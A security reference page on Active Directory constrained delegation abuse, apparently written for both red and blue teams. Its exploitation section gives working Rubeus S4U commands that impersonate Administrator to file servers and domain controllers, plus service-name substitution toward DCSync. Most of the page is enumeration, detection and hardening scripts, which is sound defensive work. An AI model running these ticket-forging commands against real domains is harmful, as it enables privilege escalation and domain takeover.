# Constrained Delegation Abuse
ATT&CK: T1558 — Steal or Forge Kerberos Tickets

Constrained delegation allows a service account to impersonate specific users to specific services (unlike unconstrained delegation, which allows impersonation to any service). When the allowed-target list is over-broad or the service account itself is compromised, it enables privilege escalation: the holder of the service account impersonates privileged users, such as service administrators, to the listed services.
## Constrained Delegation vs Unconstrained
| | Unconstrained | Constrained | Resource-Based Constrained |
|---|---|---|---|
| Config location | Account attribute | Account attribute | Target resource attribute |
| Scope | Any service | Listed services only | Resources that trust the account |
| Attack surface | TGT cached in memory | S4U2Self + S4U2Proxy abuse | RBCD |
| Introduced | Windows 2000 | Windows Server 2003 | Windows Server 2012 |
## S4U Extensions
Constrained delegation works via two Kerberos extensions:
| Extension | Purpose |
|---|---|
| S4U2Self (Service-for-User-to-Self) | Service requests a ticket to itself on behalf of any user — even without that user's password |
| S4U2Proxy (Service-for-User-to-Proxy) | Service uses the S4U2Self ticket to request a TGS to the allowed target services |
S4U2Self lets a service obtain a forwardable ticket for any user, including Domain Admins, as long as the service account has the TrustedToAuthForDelegation flag (protocol transition) set. Accounts marked "sensitive and cannot be delegated" or placed in Protected Users are the exception (see Mitigation).
## Finding Constrained Delegation Accounts
```powershell
# PowerView - accounts configured for constrained delegation
Get-DomainUser -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto

# Built-in ActiveDirectory module (RSAT)
Import-Module ActiveDirectory
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation
```
The msDS-AllowedToDelegateTo attribute lists the SPNs the account can delegate to, e.g.:
```
cifs/FILESERVER01.domain.com
host/FILESERVER01.domain.com
```
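The enumeration above returns raw attribute values; what an auditor actually wants is a risk rating per delegation target (is the target a domain controller? is protocol transition enabled?). The following is an added example, not code from the original page or from PowerView: it classifies each SPN in msDS-AllowedToDelegateTo against the patterns this page describes. The `Get-DelegationRisk` function, the constructed sample accounts and the host names in them are assumptions; the commented lines show how to feed it live data from the ActiveDirectory module.

```powershell
# Added example (not from the original page): rate each constrained-delegation
# target. Sample accounts below are constructed so the logic runs without a domain.
Import-Module ActiveDirectory -ErrorAction SilentlyContinue

function Get-DelegationRisk {
    param(
        # Objects with SamAccountName, AllowedTo (SPN list), TrustedToAuth (bool)
        [Parameter(Mandatory)] [object[]] $Accounts,
        # Domain controller host names, short or FQDN
        [Parameter(Mandatory)] [string[]] $DomainControllers
    )
    $dcSet = $DomainControllers | ForEach-Object { $_.Split('.')[0].ToLower() }
    # Service classes whose SPN on a host gives code execution or directory access
    $highValueClasses = 'cifs', 'host', 'ldap', 'http', 'wsman', 'rpcss'

    foreach ($acct in $Accounts) {
        foreach ($spn in $acct.AllowedTo) {
            # SPN format is class/host[:port]; the host decides where impersonation lands
            $class, $rest = $spn -split '/', 2
            $targetHost = ($rest -split ':')[0].Split('.')[0].ToLower()
            $isDc = $dcSet -contains $targetHost

            $reasons = @()
            if ($isDc) { $reasons += 'target is a domain controller' }
            if ($class.ToLower() -in $highValueClasses) { $reasons += "high-value service class $class" }
            if ($acct.TrustedToAuth) { $reasons += 'protocol transition enabled (S4U2Self needs no user credential)' }

            $severity = if ($isDc) { 'Critical' } elseif ($reasons.Count -gt 0) { 'High' } else { 'Info' }
            [pscustomobject]@{
                Account  = $acct.SamAccountName
                Target   = $spn
                Severity = $severity
                Reasons  = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample data (not taken from a real domain)
$sample = @(
    [pscustomobject]@{ SamAccountName = 'svc_webapp'; AllowedTo = @('cifs/FILESERVER01.domain.com', 'host/FILESERVER01.domain.com'); TrustedToAuth = $true },
    [pscustomobject]@{ SamAccountName = 'svc_app';    AllowedTo = @('cifs/DC01.domain.com');                                         TrustedToAuth = $true },
    [pscustomobject]@{ SamAccountName = 'svc_print';  AllowedTo = @('MSSQLSvc/SQL01.domain.com:1433');                              TrustedToAuth = $false }
)
Get-DelegationRisk -Accounts $sample -DomainControllers @('DC01.domain.com', 'DC02.domain.com') |
    Sort-Object Severity | Format-Table -AutoSize

# Live use (requires a domain): build the same object shape from AD, then classify.
# TrustedToAuth is read from userAccountControl bit 0x1000000 (TRUSTED_TO_AUTH_FOR_DELEGATION).
# $dcs  = (Get-ADDomainController -Filter *).HostName
# $live = Get-ADObject -Filter 'msDS-AllowedToDelegateTo -like "*"' -Properties msDS-AllowedToDelegateTo, userAccountControl, SamAccountName |
#     ForEach-Object { [pscustomobject]@{ SamAccountName = $_.SamAccountName
#                                         AllowedTo      = @($_.'msDS-AllowedToDelegateTo')
#                                         TrustedToAuth  = [bool]($_.userAccountControl -band 0x1000000) } }
# Get-DelegationRisk -Accounts $live -DomainControllers $dcs | Where-Object Severity -ne 'Info'
```

Run against the sample, `svc_app` rates Critical (its only target is a DC), both `svc_webapp` rows rate High (high-value class plus protocol transition), and the SQL target rates Info. The classification reads userAccountControl directly rather than the TrustedToAuthForDelegation extended property because Get-ADObject returns raw attributes.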
## Exploitation
### Step 1: Compromise the Service Account
If we control a service account with constrained delegation, we can impersonate any user to the allowed services.
```powershell
# Rubeus - S4U chain: impersonate Administrator to cifs/FILESERVER01
.\Rubeus.exe s4u /user:svc_webapp /password:P@ssw0rd /impersonateuser:Administrator /msdsspn:cifs/FILESERVER01 /ptt

# If we have the NTLM hash instead of the password:
.\Rubeus.exe s4u /user:svc_webapp /rc4:<ntlm_hash> /impersonateuser:Administrator /msdsspn:cifs/FILESERVER01 /ptt
```
### Step 2: Use the Ticket
After /ptt (pass-the-ticket), the ticket is injected into the current session:
```powershell
# Access the share as Administrator
dir \\FILESERVER01\C$

# Or run commands
PsExec.exe \\FILESERVER01 cmd.exe
```
### Alternate Target — Protocol Transition for Host SPN
If the service is allowed to delegate to host/DCNAME or cifs/DCNAME, escalation to the DC becomes possible.
```powershell
# Escalate to DC via cifs
.\Rubeus.exe s4u /user:svc_app /rc4:<hash> /impersonateuser:Administrator /msdsspn:"cifs/DC01.domain.com" /ptt
```
### Service Name Substitution
An important nuance: the TGS returned by S4U2Proxy has a service name embedded in it. Some services only check the hostname portion, meaning a ticket for cifs/FILESERVER01 can sometimes be used as if it were ldap/FILESERVER01 by changing the service class in the ticket.
```powershell
# Rubeus - request cifs ticket but use it for LDAP (service name substitution)
.\Rubeus.exe s4u /user:svc_app /rc4:<hash> /impersonateuser:Administrator /msdsspn:"cifs/DC01" /altservice:ldap /ptt
```
This technique enables DCSync if ldap/DC01 is in the delegation list (or via service name substitution from cifs).
## Detection
### Event IDs
| Event | Signal |
|---|---|
| 4769 with TicketOptions including delegation flags | S4U2Proxy ticket request |
| 4648 | Explicit credential logon from service account |
| S4U2Self auditing (Event 4769 with TransmittedServices) | S4U2Self invocation |
### KQL Detection
```kql
// Detect S4U2Proxy: tickets requested using constrained delegation
SecurityEvent
| where EventID == 4769
| where ServiceName !endswith "$"
// Forwarded or proxy-forwardable
| where TicketOptions has_any ("0x20000", "0x40000")
| summarize DistinctTargets = dcount(ServiceName) by AccountName, bin(TimeGenerated, 1h)
| where DistinctTargets > 3
```
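The KQL above assumes a SIEM; the same two signals from the Event IDs table (a populated TransmittedServices field marking an S4U2Proxy chain, and one account fanning out to many targets within an hour) can be checked on exported 4769 records directly. This is an added example, not part of the original page or of any Microsoft detection content. The `Find-S4U2ProxyActivity` and `ConvertFrom-TicketOptions` functions, the threshold default and the sample event records (including their AccountName and TransmittedServices values) are constructed assumptions; it also decodes the TicketOptions bit field, which the page only references by hex value.

```powershell
# Added example (not from the original page): S4U2Proxy detection over 4769 records.
# The event records below are constructed; the tail shows how to feed live events.
$Flag = @{ Forwardable = 0x40000000; Forwarded = 0x20000000; Proxiable = 0x10000000; Proxy = 0x08000000; Renewable = 0x00800000 }

function ConvertFrom-TicketOptions {
    # 4769 logs TicketOptions as a single hex string such as "0x40810000"; return the set bit names
    param([Parameter(Mandatory)] [string] $Hex)
    $value = [Convert]::ToUInt32(($Hex -replace '^0x', ''), 16)
    $Flag.Keys | Where-Object { ($value -band $Flag[$_]) -ne 0 } | Sort-Object
}

function Find-S4U2ProxyActivity {
    param(
        # Objects with TimeGenerated, AccountName (as the event logs it), ServiceName, TicketOptions, TransmittedServices
        [Parameter(Mandatory)] [object[]] $Events,
        # DC service account names (e.g. DC01$) so delegation onto a DC alerts on its own
        [string[]] $DomainControllers = @(),
        [int] $DistinctTargetThreshold = 3
    )
    $delegated = foreach ($e in $Events) {
        # A populated TransmittedServices field means a delegation chain (S4U2Proxy) produced this ticket
        if ($e.TransmittedServices -and $e.TransmittedServices -ne '-') {
            [pscustomobject]@{
                Hour        = $e.TimeGenerated.Date.AddHours($e.TimeGenerated.Hour)
                AccountName = $e.AccountName
                ServiceName = $e.ServiceName
                Flags       = ((ConvertFrom-TicketOptions $e.TicketOptions) -join ',')
                ViaService  = $e.TransmittedServices
                IsDcTarget  = ($DomainControllers -contains $e.ServiceName)
            }
        }
    }
    $alerts = @()
    # Signal 1: any delegated ticket landing on a domain controller
    $alerts += $delegated | Where-Object IsDcTarget | ForEach-Object {
        [pscustomobject]@{ Type = 'DelegationToDC'; AccountName = $_.AccountName; Detail = "$($_.ViaService) -> $($_.ServiceName) [$($_.Flags)]" }
    }
    # Signal 2: one account reaching more distinct targets per hour than the threshold (mirrors the KQL summarize)
    $alerts += $delegated | Group-Object AccountName, Hour | ForEach-Object {
        $targets = @($_.Group.ServiceName | Sort-Object -Unique)
        if ($targets.Count -gt $DistinctTargetThreshold) {
            [pscustomobject]@{ Type = 'FanOut'; AccountName = $_.Group[0].AccountName; Detail = ($targets -join ',') }
        }
    }
    $alerts
}

# Constructed sample events (not real log data); off-hours timestamps on purpose
$t0 = Get-Date '2024-01-15 02:00:00'
$sampleEvents = @(
    [pscustomobject]@{ TimeGenerated = $t0.AddMinutes(2);  AccountName = 'Administrator@DOMAIN.COM'; ServiceName = 'FILESERVER01$'; TicketOptions = '0x40810000'; TransmittedServices = 'http/WEBAPP01.domain.com' },
    [pscustomobject]@{ TimeGenerated = $t0.AddMinutes(4);  AccountName = 'Administrator@DOMAIN.COM'; ServiceName = 'FILESERVER02$'; TicketOptions = '0x40810000'; TransmittedServices = 'http/WEBAPP01.domain.com' },
    [pscustomobject]@{ TimeGenerated = $t0.AddMinutes(6);  AccountName = 'Administrator@DOMAIN.COM'; ServiceName = 'SQL01$';        TicketOptions = '0x40810000'; TransmittedServices = 'http/WEBAPP01.domain.com' },
    [pscustomobject]@{ TimeGenerated = $t0.AddMinutes(8);  AccountName = 'Administrator@DOMAIN.COM'; ServiceName = 'WS42$';         TicketOptions = '0x40810000'; TransmittedServices = 'http/WEBAPP01.domain.com' },
    [pscustomobject]@{ TimeGenerated = $t0.AddMinutes(9);  AccountName = 'Administrator@DOMAIN.COM'; ServiceName = 'DC01$';         TicketOptions = '0x40810000'; TransmittedServices = 'http/WEBAPP01.domain.com' },
    [pscustomobject]@{ TimeGenerated = $t0.AddMinutes(30); AccountName = 'alice@DOMAIN.COM';         ServiceName = 'FILESERVER01$'; TicketOptions = '0x40810000'; TransmittedServices = '-' }
)
Find-S4U2ProxyActivity -Events $sampleEvents -DomainControllers @('DC01$', 'DC02$') | Format-Table -AutoSize

# Live use on a DC: pull 4769 events and map the EventData fields into the same shape
# (TargetUserName -> AccountName, ServiceName, TicketOptions, TransmittedServices, TimeCreated -> TimeGenerated).
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 } | ForEach-Object {
#     $d = ([xml]$_.ToXml()).Event.EventData.Data
#     [pscustomobject]@{ TimeGenerated = $_.TimeCreated
#                        AccountName   = ($d | Where-Object Name -eq 'TargetUserName').'#text'
#                        ServiceName   = ($d | Where-Object Name -eq 'ServiceName').'#text'
#                        TicketOptions = ($d | Where-Object Name -eq 'TicketOptions').'#text'
#                        TransmittedServices = ($d | Where-Object Name -eq 'TransmittedServices').'#text' }
# } | Find-S4U2ProxyActivity -DomainControllers ((Get-ADDomainController -Filter *).Name | ForEach-Object { "$_$" })
```

Against the sample the function raises one DelegationToDC alert (the chain onto DC01$) and one FanOut alert (five distinct targets in the 02:00 hour), while alice's plain ticket with TransmittedServices of `-` is ignored. Decoding TicketOptions into named bits is what lets the filter refer to Forwardable or Forwarded explicitly instead of matching hex substrings, and the Flags column keeps that context in the alert.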
### Behavioral Indicator
A service account authenticating to services it is not normally seen accessing (even if those services are in its delegation list) is suspicious, especially during off-hours.
## Mitigation
| Control | Effect |
|---|---|
| Audit msDS-AllowedToDelegateTo across all accounts | Find over-broad delegation configs |
| Never add host/DC or cifs/DC to the delegation list | Prevent escalation to DCs |
| Protected Users group | Accounts cannot be impersonated via delegation |
| "Account is sensitive and cannot be delegated" | Prevents any delegation impersonation of that account |
| Prefer RBCD over constrained delegation | RBCD is more controllable |
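The two account-level controls in the table (Protected Users membership and the "sensitive and cannot be delegated" flag) are only effective on the accounts that actually carry them, so the useful check is: which high-privilege accounts have neither? This is an added example, not from the original page: the `Test-ImpersonationHardening` function and the constructed sample accounts are assumptions, and the commented lines show the live query against Domain Admins with the ActiveDirectory module.

```powershell
# Added example (not from the original page): find privileged accounts that S4U2Self
# can still mint tickets for. Sample accounts are constructed; live query at the end.
function Test-ImpersonationHardening {
    # Objects with SamAccountName, AccountNotDelegated (bool), MemberOf (group DNs)
    param([Parameter(Mandatory)] [object[]] $Accounts)
    foreach ($a in $Accounts) {
        $inProtectedUsers = [bool]($a.MemberOf | Where-Object { $_ -like 'CN=Protected Users,*' })
        $sensitive        = [bool]$a.AccountNotDelegated   # "Account is sensitive and cannot be delegated" (UAC NOT_DELEGATED)
        [pscustomobject]@{
            Account        = $a.SamAccountName
            SensitiveFlag  = $sensitive
            ProtectedUsers = $inProtectedUsers
            # $true means neither blocker is present: a delegating service could impersonate this account
            Delegatable    = -not ($sensitive -or $inProtectedUsers)
        }
    }
}

# Constructed sample accounts (not from a real domain)
$sample = @(
    [pscustomobject]@{ SamAccountName = 'Administrator'; AccountNotDelegated = $false; MemberOf = @('CN=Domain Admins,CN=Users,DC=domain,DC=com') },
    [pscustomobject]@{ SamAccountName = 'da_alice';      AccountNotDelegated = $true;  MemberOf = @('CN=Domain Admins,CN=Users,DC=domain,DC=com') },
    [pscustomobject]@{ SamAccountName = 'da_bob';        AccountNotDelegated = $false; MemberOf = @('CN=Domain Admins,CN=Users,DC=domain,DC=com', 'CN=Protected Users,CN=Users,DC=domain,DC=com') }
)
# Only 'Administrator' comes back: no sensitive flag and not in Protected Users
Test-ImpersonationHardening -Accounts $sample | Where-Object Delegatable | Format-Table -AutoSize

# Live use: every user nested under Domain Admins, with the two properties the check needs
# $tier0 = Get-ADGroupMember 'Domain Admins' -Recursive | Where-Object objectClass -eq 'user' |
#          Get-ADUser -Properties AccountNotDelegated, MemberOf
# Test-ImpersonationHardening -Accounts $tier0 | Where-Object Delegatable
```

Pair this with the delegation audit: an account that shows up here and is also a target of a service in the delegation list is exactly the combination the S4U chain above needs.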
## Cross-Links
| Topic | Link |
|---|---|
| Unconstrained Delegation | unconstrained-delegation |
| RBCD | rbcd |
| Kerberos | kerberos |